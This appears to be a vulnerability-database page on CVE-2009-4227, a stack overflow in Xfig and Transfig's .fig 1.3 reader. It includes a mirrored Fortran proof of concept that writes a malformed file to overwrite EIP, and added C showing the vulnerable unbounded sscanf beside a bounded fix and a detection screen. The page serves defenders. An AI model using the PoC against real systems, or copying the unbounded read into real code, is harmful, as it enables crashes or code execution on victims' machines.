CVE-2009-4227


Description

Stack-based buffer overflow in the read_1_3_textobject function in f_readold.c in Xfig 3.2.5b and earlier, and in the read_textobject function in read1_3.c in fig2dev in Transfig 3.2.5a and earlier, allows remote attackers to execute arbitrary code via a long string in a malformed .fig file that uses the 1.3 file format. NOTE: some of these details are obtained from third party information.

Predictions

Exploit likelihood: 20%
Patch ETA: not given
Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet. The only remediation data on this page is the set of Debian fixed-in versions under OS impact; until a patched build is installed, the practical workaround is the one the PoC author gives, namely not opening untrusted .fig files in xfig or passing them through fig2dev.


Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-33388 · remote · linux · verified · text · 2 KB
Author: pedamachephepto · 2009-12-03

Xfig and Transfig 3.2.5 - '.fig' Remote Buffer Overflow

Text exploit. Source: Exploit-DB, mirrored from https://www.securityfocus.com/bid/37193/info

Xfig and Transfig are prone to a buffer-overflow vulnerability because they fail to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Xfig and Transfig 3.2.5 are vulnerable; other versions may also be affected. 

       PROGRAM XFIG_POC

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
C
C      XFIG <= 3.2.5B BUFFER OVERFLOW
C      TRANSFIG <= 3.2.5A (FIG2DEV SOFT) BUFFER OVERFLOW
C      WWW.XFIG.ORG
C
C      AUTHORS:
C      * PEDAMACHEPHEPTOLIONES <pedamachepheptoliones@gmail.com>
C      * D.B. COOPER
C
C      PROBLEM:
C      A STACK-BASED BUFFER OVERFLOW OCCURS IN read_1_3_textobject()
C      WHEN READING MALFORMED .FIG FILES
C      EIP IS OVERWRITTEN SO IT'S NOT JUST A CRASH
C
C      TEST:
C      xfig plane.fig
C      fig2dev -L png plane.fig
C      (IT DOESN'T HAVE TO BE "PNG")
C
C      SOLUTION:
C      DON'T TAKE .FIG CANDY FROM STRANGERS
C
C      OLDSKOOL FORTRAN POCS FTW
C
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

       INTEGER I
       CHARACTER(LEN=167) :: STR

       DO 10 I=1,167
       STR(I:I)='Z'
10     CONTINUE

       OPEN(11,FILE='plane.fig')
       WRITE(11,*) '0 1 2 3'
       WRITE(11,*) '4'
       WRITE(11,*) '1 2 3 4 5 6 7 '//STR
       CLOSE(11)

       WRITE(*,*) 'GREETZ: BACKUS AND BACCHUS'

       END PROGRAM XFIG_POC
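The description and the SecurityFocus summary above both reduce to one unbounded read: the text field of a 1.3-format text object is copied from the file into a fixed-size stack buffer with no length check, which is what the 167-byte string in the PoC exploits. The C below is an added example, not xfig or transfig source: it shows that pattern next to a bounded reader and a defender-side screen built on it. The field layout (seven integers followed by the text, as the PoC writes), the 128-byte buffer size, and every function name are assumptions made for illustration; the sample .fig content is constructed in the code.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not xfig's or transfig's code. The 1.3 text object is
 * modelled as seven integers then the text up to end of line (the layout the
 * PoC writes). TEXT_BUF is an assumed buffer size chosen so the PoC's 167-byte
 * string overruns it; fields beyond font and size are placeholders. */
#define TEXT_BUF 128
_Static_assert(TEXT_BUF == 128, "the 127 width in the bounded format must be TEXT_BUF-1");

struct text_obj {
    int font, size, base_x, base_y;
    char str[TEXT_BUF];
};

/* Vulnerable pattern: "%[^\n]" with no field width copies the whole rest of
 * the line into the fixed buffer, so any string of TEXT_BUF bytes or more
 * writes past t->str. With the buffer in a stack frame this is the return
 * address overwrite the PoC header describes. Kept only as the "before" of
 * the fix; never run it on untrusted input. */
static int read_text_unbounded(const char *line, struct text_obj *t)
{
    int dum;
    int n = sscanf(line, " %d %d %d %d %d %d %d %[^\n]",
                   &t->font, &t->size, &dum, &dum,
                   &t->base_x, &t->base_y, &dum, t->str);
    return n == 8 ? 0 : -1;
}

/* Hardened reader: the conversion is capped at TEXT_BUF-1 bytes, %n records
 * how much of the line was consumed, and leftover text means the string did
 * not fit, so the object is rejected rather than silently truncated.
 * Returns 0 ok, -1 not a text object, -2 string too long for the buffer. */
static int read_text_bounded(const char *line, struct text_obj *t)
{
    int dum, consumed = 0;
    int n = sscanf(line, " %d %d %d %d %d %d %d %127[^\n]%n",
                   &t->font, &t->size, &dum, &dum,
                   &t->base_x, &t->base_y, &dum, t->str, &consumed);
    if (n != 8)
        return -1;
    if (line[consumed] != '\0' && line[consumed] != '\n')
        return -2;
    return 0;
}

/* Single-line wrapper so callers need not own a struct text_obj. */
static int bounded_status(const char *line)
{
    struct text_obj t;
    return read_text_bounded(line, &t);
}

/* Constructs the three-line file the Fortran PoC writes, with `len` copies of
 * 'Z' as the text (the list-directed leading blank is irrelevant, the format
 * skips whitespace). Returns bytes written, or 0 if `cap` is too small. */
static size_t build_poc_fig(char *out, size_t cap, size_t len)
{
    const char *head = "0 1 2 3\n4\n1 2 3 4 5 6 7 ";
    size_t h = strlen(head);
    if (cap < h + len + 2)
        return 0;
    memcpy(out, head, h);
    memset(out + h, 'Z', len);
    out[h + len] = '\n';
    out[h + len + 1] = '\0';
    return h + len + 1;
}

/* Defender-side screen: count lines that parse as a 1.3 text object whose
 * string would not fit the old reader's buffer. Any non-zero count marks a
 * file to quarantine rather than open with a vulnerable xfig or fig2dev. */
static int count_oversized_text_lines(const char *fig)
{
    int n = 0;
    struct text_obj t;
    char line[4096];
    const char *p = fig;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line)
            len = sizeof line - 1;  /* truncating still leaves >127 text bytes to detect */
        memcpy(line, p, len);
        line[len] = '\0';
        if (read_text_bounded(line, &t) == -2)
            n++;
        if (!nl)
            break;
        p = nl + 1;
    }
    return n;
}

/* Builds a PoC-style file with a text string of `len` bytes and screens it. */
static int poc_oversized_count(size_t len)
{
    char buf[8192];
    if (!build_poc_fig(buf, sizeof buf, len))
        return -1;
    return count_oversized_text_lines(buf);
}

int main(void)
{
    struct text_obj t;
    printf("PoC file (167-byte string), flagged lines: %d\n", poc_oversized_count(167));
    printf("benign file (20-byte string), flagged lines: %d\n", poc_oversized_count(20));
    printf("bounded reader on a short line: %d\n", bounded_status("1 2 3 4 5 6 7 hello"));
    printf("unbounded reader on the same short line: %d\n",
           read_text_unbounded("1 2 3 4 5 6 7 hello", &t));
    return 0;
}
```

The screen flags any line that parses as a text object with more than 127 bytes of text; the threshold is tied to the assumed buffer size, so anyone adapting this to the real reader should take the width from the actual declaration in f_readold.c or read1_3.c rather than from this example.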

OS impact

Debian: fixed in 5 releases

Release     Status   Fixed in
bullseye    Fixed    1:3.2.5.b-1
bookworm    Fixed    1:3.2.5.b-1
trixie      Fixed    1:3.2.5.b-1
forky       Fixed    1:3.2.5.b-1
sid         Fixed    1:3.2.5.b-1

References

SecurityFocus BID 37193 (source of the Exploit-DB entry): https://www.securityfocus.com/bid/37193/info
Exploit-DB EDB-33388: Xfig and Transfig 3.2.5 - '.fig' Remote Buffer Overflow